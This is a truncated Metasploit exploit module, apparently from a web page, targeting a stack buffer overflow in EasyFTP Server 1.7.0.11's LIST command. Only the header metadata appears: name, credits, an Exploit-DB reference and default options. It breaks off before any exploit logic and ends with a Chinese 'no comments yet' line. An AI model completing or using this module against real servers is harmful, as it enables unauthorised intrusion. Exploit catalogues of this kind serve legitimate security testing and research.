require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Ftp
def initialize(info = {})
super(update_info(info,
'Name' => 'EasyFTP Server <= 1.7.0.11 LIST Command Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11.
credit goes to Karn Ganeshan.
},
'Author' =>
[
'Karn Ganeshan <karnganeshan [at] gmail.com>',
'MFR'
],
'License' => MSF_LICENSE,
'Version' => 'Version: 1',
'References' =>
[
[ 'EDB', '14400' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
暂无评论